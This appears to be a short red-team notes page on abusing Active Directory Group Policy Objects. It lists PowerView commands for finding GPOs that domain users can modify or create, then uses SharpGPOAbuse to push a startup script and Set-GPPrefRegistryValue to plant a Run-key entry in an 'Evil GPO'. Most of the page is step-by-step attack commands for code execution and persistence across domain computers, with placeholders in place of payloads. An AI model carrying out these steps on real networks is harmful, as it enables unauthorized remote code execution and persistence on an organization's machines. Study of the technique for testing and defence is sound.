GPOs
Introduction
A GPO (Group Policy Object) is a collection of settings that define how computers and users on a network should behave. GPOs are used to enforce security policies, configure system settings, and manage software installations across multiple computers in an organization.
If domain users can modify a GPO, it can lead to several problems like having RCE on a machine.
Modifiable GPOs
1. Enumerate modifiable GPOs
Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "CreateChild|WriteProperty" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }2. If there is any, resolve its GPO name and the SID of the principal.
Get-DomainGPO -Identity "<ObjectDN>" | select displayName, gpcFileSysPath
ConvertFrom-SID <SecurityIdentifier>3. Find out the OU where the GPO appears.
Get-DomainOU -GPLink "{RelativeDN}" | select distinguishedName4. Get the computer where the GPO applies.
Get-DomainComputer -SearchBase "<OU_distinguishedname>" | select dnsHostName5. Modify the GPO
.\SharpGPOAbuse.exe --AddComputerScript --ScriptName startup.bat --ScriptContents "<SCRIPT_CONTENT>" --GPOName "<GPO_NAME>"6. Wait for the GPO to take effect (20 minutes or so).
Principals with Create groupPolicyContainer objects privilege
1. Enumerate principals (Users/groups) that can create new GPOs in the domain.
Get-DomainObjectAcl -Identity "CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" -and $_.ActiveDirectoryRights -contains "CreateChild" } | % { ConvertFrom-SID $_.SecurityIdentifier }2. Look for OUs with "WriteProperty" on the attribute "GP-LINK".
3. Become the principal and create a GPO
Set-GPPrefRegistryValue -Name "Evil GPO" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "<COMMAND>" -Type ExpandStringLast updated